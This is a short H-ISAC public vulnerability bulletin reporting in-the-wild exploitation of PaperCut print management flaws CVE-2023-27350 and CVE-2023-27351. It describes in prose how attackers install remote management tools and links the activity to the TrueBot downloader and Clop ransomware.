H-ISAC TLP White Vulnerability Bulletin PaperCut Vulnerability Exploitation April 24, 2023

On April 24, 2023, reports circulated about attackers exploiting severe vulnerabilities in the widely-used PaperCut MF/NG print management software to install Atera remote management software in order to compromise servers.  

PaperCut’s printing management software is widely used across various industries, including large companies, state organizations, and educational institutions. PaperCut is also compatible with major brands and platforms, which highlights its popularity and the potential risk of the vulnerabilities being exploited. 

The vulnerabilities tracked as CVE-2023-27350 and CVE-2023-27351, both have high criticality scores according to the national vulnerability database and could allow remote attackers to bypass authentication and execute arbitrary code on compromised PaperCut servers with SYSTEM privileges. 

According to the print management software provider, evidence strongly suggests that the PaperCut vulnerabilities are being exploited in the wild. Reports have confirmed the release of a CVE-2023-27350 proof-of-concept (PoC) that attackers could use to bypass authentication and execute code on unpatched PaperCut servers. The Cybersecurity and Infrastructure Security Agency (CISA) recently added CVE-2023-27350 to the known exploited vulnerabilities (KEV) catalog. 

Security researchers have been tracking the ongoing activity since April 16 and observed threat actors leveraging the vulnerability to execute PowerShell commands that install legitimate remote management software, including Atera and Syncro.   

The malicious activity was preceded by the registration of the windowservicecenter[.]com domain on April 12th, which was also used to host and deliver TrueBot downloader, a malware linked to the Silence cybercrime group and used to deploy Clop ransomware payloads since December 2022. 

View the detailed report below.